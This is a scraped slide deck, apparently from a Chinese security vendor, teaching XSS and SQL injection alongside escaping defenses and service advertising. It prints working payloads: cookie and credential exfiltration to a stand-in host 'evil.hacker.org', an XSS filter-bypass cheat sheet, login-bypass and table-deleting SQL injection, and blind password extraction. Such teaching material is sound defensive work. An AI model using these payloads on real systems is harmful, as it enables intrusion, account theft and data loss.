Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
入侵技术交流 防御 WEB2.0 时代
用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript 浏览器 服务端 ? Web 1.0 ? Web 2.0
<cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
攻 防
register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
绿盟科技专业服务 代码审计服务 渗透测试服务
<?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, $username, $password); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? 代码审计服务 绿盟科技安全小组使用白盒 (White Box) 测试对源代码进行审计,找出编程缺陷,并提供改进建议及最佳安全编码实践。
<?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? 代码审计服务
Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。 ? 渗透测试服务 Pen-test Team Web Server Succeed Succeed Succeed
此广告位 招租 请联系 68730606-8502 按出价高低顺序约谈…
?
Professional Security Solution Provider Thanks!

Recommended

javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当javascript的分层概念 --- 阿当
javascript的分层概念 --- 阿当
裕波 周
?
让我们的页面跑得更快
让我们的页面跑得更快让我们的页面跑得更快
让我们的页面跑得更快
li qiang
?
贵濒补蝉丑对象在(齿)贬迟尘濒中的格式和参数及安全性
贵濒补蝉丑对象在(齿)贬迟尘濒中的格式和参数及安全性贵濒补蝉丑对象在(齿)贬迟尘濒中的格式和参数及安全性
贵濒补蝉丑对象在(齿)贬迟尘濒中的格式和参数及安全性
taobao.com
?
如何实现登出按钮
如何实现登出按钮如何实现登出按钮
如何实现登出按钮
LI Daobing
?
AngularJS Sharing
AngularJS SharingAngularJS Sharing
AngularJS Sharing
Tom Chen
?
Share xss
Share xssShare xss
Share xss
paitoubing
?
TBAD F2E 2010 review
TBAD F2E 2010 reviewTBAD F2E 2010 review
TBAD F2E 2010 review
leneli
?
m.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimizationm.taobao.com for iPhone&Android Optimization
m.taobao.com for iPhone&Android Optimization
346682530
?
Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On Rails
Jesse Cai
?
对于闯蝉的跨域操作
对于闯蝉的跨域操作对于闯蝉的跨域操作
对于闯蝉的跨域操作
王 承石
?
揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3
Adam Lu
?
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
裕波 周
?
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.com
tellyeefe
?
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础
xki
?
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3
edanwade
?
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大
taobao.com
?
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methods
yiditushe
?
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)
旻琦 潘
?
日新培训
日新培训日新培训
日新培训
pan quanjin
?
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战
xiang.zhaox
?
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin Rohling
Kevin Rohling
?
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services
王 承石
?
搁耻产测程式语言入门导览
搁耻产测程式语言入门导览搁耻产测程式语言入门导览
搁耻产测程式语言入门导览
Mu-Fan Teng
?
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战
fengmk2
?
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽
Felinx Lee
?
Cms and Html
Cms and HtmlCms and Html
Cms and Html
zaiyou
?
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTML
zaiyou
?
齿蝉诲培训资料
齿蝉诲培训资料齿蝉诲培训资料
齿蝉诲培训资料
彦波 叶
?

More Related Content

Similar to 奥别产安全解决方案痴1.0 (20)

Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On Rails
Jesse Cai
?
对于闯蝉的跨域操作
对于闯蝉的跨域操作对于闯蝉的跨域操作
对于闯蝉的跨域操作
王 承石
?
揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3
Adam Lu
?
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
裕波 周
?
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.com
tellyeefe
?
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础
xki
?
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3
edanwade
?
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大
taobao.com
?
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methods
yiditushe
?
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)
旻琦 潘
?
日新培训
日新培训日新培训
日新培训
pan quanjin
?
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战
xiang.zhaox
?
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin Rohling
Kevin Rohling
?
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services
王 承石
?
搁耻产测程式语言入门导览
搁耻产测程式语言入门导览搁耻产测程式语言入门导览
搁耻产测程式语言入门导览
Mu-Fan Teng
?
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战
fengmk2
?
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽
Felinx Lee
?
Cms and Html
Cms and HtmlCms and Html
Cms and Html
zaiyou
?
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTML
zaiyou
?
齿蝉诲培训资料
齿蝉诲培训资料齿蝉诲培训资料
齿蝉诲培训资料
彦波 叶
?
Collaboration On Rails
Collaboration On RailsCollaboration On Rails
Collaboration On Rails
Jesse Cai
?
对于闯蝉的跨域操作
对于闯蝉的跨域操作对于闯蝉的跨域操作
对于闯蝉的跨域操作
王 承石
?
揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3揭秘贬迟尘濒5和颁蝉蝉3
揭秘贬迟尘濒5和颁蝉蝉3
Adam Lu
?
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
揭秘贬迟尘濒5和颁蝉蝉3 ---- 鲁超伍
裕波 周
?
Html5css3 go.yeefe.com
Html5css3 go.yeefe.comHtml5css3 go.yeefe.com
Html5css3 go.yeefe.com
tellyeefe
?
WEB 安全基础
WEB 安全基础WEB 安全基础
WEB 安全基础
xki
?
Struts1+ hibernate3
Struts1+ hibernate3Struts1+ hibernate3
Struts1+ hibernate3
edanwade
?
YUI ─ 阿大
YUI ─ 阿大YUI ─ 阿大
YUI ─ 阿大
taobao.com
?
Ajax Transportation Methods
Ajax Transportation MethodsAjax Transportation Methods
Ajax Transportation Methods
yiditushe
?
Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)Rails 快速上手攻略(Rails Getting Started)
Rails 快速上手攻略(Rails Getting Started)
旻琦 潘
?
日新培训
日新培训日新培训
日新培训
pan quanjin
?
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战
xiang.zhaox
?
Introduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin RohlingIntroduction to AI Agents (8/2/23) - Kevin Rohling
Introduction to AI Agents (8/2/23) - Kevin Rohling
Kevin Rohling
?
zend framework in web services
zend framework in web serviceszend framework in web services
zend framework in web services
王 承石
?
搁耻产测程式语言入门导览
搁耻产测程式语言入门导览搁耻产测程式语言入门导览
搁耻产测程式语言入门导览
Mu-Fan Teng
?
Node Web开发实战
Node Web开发实战Node Web开发实战
Node Web开发实战
fengmk2
?
Python web开发吐槽
Python web开发吐槽Python web开发吐槽
Python web开发吐槽
Felinx Lee
?
Cms and Html
Cms and HtmlCms and Html
Cms and Html
zaiyou
?
Cms and HTML
Cms and HTMLCms and HTML
Cms and HTML
zaiyou
?
齿蝉诲培训资料
齿蝉诲培训资料齿蝉诲培训资料
齿蝉诲培训资料
彦波 叶
?

奥别产安全解决方案痴1.0

  • 1. Penetration test Software developer Security analyst Security consultation Whatever
  • 2. 跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
  • 4. ?
  • 5. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 6. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 7. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 8. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 9. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
  • 10. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
  • 11. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
  • 12. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...\n&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
  • 13. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...\n&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
  • 14. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
  • 15. … <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=/slideshow/webv10/460315/&quot;http:/evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot;\n&quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
  • 16. <INPUT TYPE=&quot;image&quot; SRC=/slideshow/webv10/460315/&quot;http:/example&quot;><script>alert(& <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;> ? Normally ? Evil
  • 17. ? Danger replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’ ? Weak
  • 18. <INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > ? Evil Dim re ????Set re=new RegExp ????re.IgnoreCase =True ????re.Global=True re.Pattern=/slideshow/webv10/460315/&quot;javascript:&quot; ????Str = re.replace(Str,/slideshow/webv10/460315/&quot;javascript : &quot;) ????re.Pattern=&quot;jscript:&quot; ?? Str = re.replace(Str,&quot;jscript : &quot;) ????re.Pattern=&quot;vbscript:&quot; ?? Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing ? N ot so good ? Danger javascript:
  • 19. <INPUT TYPE=&quot;image&quot; SRC=/slideshow/webv10/460315/javascript& ? Evil ? Danger ‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;) ? Weak
  • 20. <img src=/slideshow/webv10/460315/&quot;javas cript:alert('xss')&quot;> ? Evil ? Danger replace(str,“ ”,“&nbsp; “) ? Weak
  • 22. function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,'&#39;',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot;\t&quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot;\r&quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
  • 23. <img src=/slideshow/webv10/460315/&quot; onerror=alert(/xss/)> ? Evil <img src=/slideshow/webv10/460315/&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=/slideshow/webv10/460315/&quot;/**/onerror=alert(/xss/) > ? Evil ? Evil
  • 24. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器 ? ? ? ?
  • 25. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器 ? replace(str, safer, danger) …… …… 事前 Htmlspecialchars ($html, ENT_QUOTES) …… 事中 FireFox no script …… …… 事后
  • 26. ? Danger ? Danger
  • 27. POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login Danger
  • 28. ‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
  • 29. <input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=/slideshow/webv10/460315/&quot;javascript:danger()&quot;>...
  • 31. <meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(/slideshow/webv10/460315/&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
  • 32. <body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
  • 34. <object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
  • 35. [IE] <div style=&quot;behaviour: url( /slideshow/webv10/460315/[link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( /slideshow/webv10/460315/[link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=/slideshow/webv10/460315/&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=/slideshow/webv10/460315/&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [\xC0][\xBC]script>[code][\xC0][\xBC]/script> <a href=&quot; javas&#99;ript&#35;[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <s&#99;ript>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
  • 36. Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
  • 37. <?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘\n’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot;\n&quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
  • 38. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;\n\r&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;\n\r&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
  • 39. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;\n\r&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;\n\r&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
  • 40. $_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
  • 41. ?
  • 43. ?
  • 44. ... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in...\n&quot;; } ?> ? select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ? 用户: 密码: 确定 取消
  • 45. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
  • 46. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in… ? Worse 用户: 密码: 确定 取消
  • 47. <Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result...\n&quot;; } ?> ? select * from user where username like ‘ %$search_name %‘ order by id desc ? Search page: 确定
  • 48. select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
  • 49. <Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update...\n&quot;; } ?> ? update user set passwd='$passwd' where uid='$uid' ? Update your password: 确定
  • 50. update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
  • 51. Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … MYSQL SERVER 将 varchar 值“ luyq@#11” 转换时发生语法错误。 /show/query.php ,第 87 行 Password 是 luyq@#11 Attacker FALSE FALSE
  • 52. Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
  • 53. show_source() highlight_string() highlight_file() Other Show error message function… ? Take care error_reporting() Php.ini ------- display_errors = off ? Better
  • 54. 1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
  • 55. Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
  • 56. Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
  • 57. Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
  • 58. 1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
  • 59. Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
  • 60. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
